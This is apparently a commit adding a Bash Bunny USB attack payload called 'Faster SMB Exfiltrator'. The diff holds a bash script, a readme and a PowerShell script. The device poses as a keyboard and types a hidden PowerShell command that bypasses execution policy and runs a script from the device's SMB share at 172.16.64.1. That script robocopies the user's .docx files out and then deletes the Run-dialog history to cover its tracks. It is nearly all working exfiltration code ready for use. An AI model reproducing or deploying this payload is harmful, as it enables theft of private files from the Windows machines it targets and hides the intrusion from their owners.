Add faster SMB Exfiltrator payload

payloads/library/faster_smb_exfiltrator/payload.txt

@@ -0,0 +1,93 @@
+#!/bin/bash
+#
+# Title:         Faster SMB Exfiltrator
+# Author:        Hak5Darren
+# Props:         ImNatho, mike111b, madbuda
+# Version:       1.0
+# Category:      Exfiltration
+# Target:        Windows XP SP3+ (Powershell)
+# Attackmodes:   HID, Ethernet
+#
+# Rewrite of the original SMB Exfiltrator payload with:
+# - Faster copying, using robocopy multithreaded mode
+# - Faster finish, using a EXFILTRATION_COMPLETE file
+# - Offload logic to target PC for accurate date/time
+# - Clears tracks by default without second run dialog
+# - Test-Connection handling by ICMP (no lame sleeps)
+# - Hidden powershell window by default
+# 
+# LED Status
+# Red Blinking.........Failed to find dependencies
+# Purple Blinking......HID Stage
+# Purple...............Ethernet Stage
+# Blue/Purple..........Receiving Files
+# White................Moving Liberated Files
+# Green................Finished
+#
+# OPTIONS: configured from s.ps1
+
+
+
+######## INITIALIZATION ########
+# Check for impacket. If not found, blink fast red.
+if [ ! -d /pentest/impacket/ ]; then
+  LED R 100
+  exit 1
+fi
+
+
+
+######## SETUP ########
+# Get switch position from bunny helpers
+source bunny_helpers.sh
+# Make temporary loot directory
+mkdir -p /loot/smb/
+# Delete any old exfiltration data
+rm -rf /loot/smb/*
+# Copy new powershell payload to smb share
+cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
+# Make loot directory on USB Disk
+mkdir -p /root/udisk/loot/smb_exfiltrator
+# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+)
+echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
+
+
+
+######## HID STAGE ########
+# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
+LED R B 500
+ATTACKMODE HID
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\""
+QUACK ENTER
+
+
+
+######## ETHERNET STAGE ########
+LED R B
+ATTACKMODE RNDIS_ETHERNET
+# Start the SMB Server
+/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log &
+# Re-enable ICMP/echo replies to trip the powershell stager
+echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
+# Wait until files are done copying.
+while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done
+
+
+
+######## CLEANUP ########
+LED R G B
+# Delete EXFILTRATION_COMPLETE file
+rm -rf /loot/smb/EXFILTRATION_COMPLETE
+# Move files to udisk loot directory
+mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
+# Clean up temporary loot directory
+rm -rf /loot/smb/e/*
+# Sync file system
+sync; sleep 1; sync
+
+
+
+######## FINISH ########
+LED G # Trap is clean

payloads/library/faster_smb_exfiltrator/readme.md

@@ -0,0 +1,37 @@
+# Faster SMB Exfiltrator
+
+* Author: Hak5Darren
+* Props: ImNatho, mike111b, madbuda
+* Version: Version 1.0
+* Target: Windows XP SP3+ (Powershell)
+* Category: Exfiltration
+* Attackmodes: HID, Ethernet
+ 
+## Description
+
+Exfiltrates select files from users's documents folder via SMB.
+Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
+
+Rewrite of the original SMB Exfiltrator payload with:
+* Faster copying, using robocopy multithreaded mode
+* Faster finish, using a EXFILTRATION_COMPLETE file
+* Offload logic to target PC for accurate date/time
+* Clears tracks by default without second run dialog
+* Test-Connection handling by ICMP (no lame sleeps)
+* Hidden powershell window by default
+
+
+## Configuration
+
+Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired. 
+
+## STATUS
+
+| LED                 | Status                                 |
+| ------------------- | -------------------------------------- |
+| Red (blinking)      | Impacket not found in /pentest         |
+| Magenta (blinking)  | HID Stage                              |
+| Magenta             | Ethernet Stage                         |
+| Magenta/Blue        | Receiving files                        |
+| White               | Moving liberated files to mass storage |
+| Green               | Finished                               |

payloads/library/faster_smb_exfiltrator/s.ps1

@@ -0,0 +1,7 @@
+$exfil_dir="$Env:UserProfile\Documents"
+$exfil_ext="*.docx"
+$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
+mkdir $loot_dir
+robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z
+New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue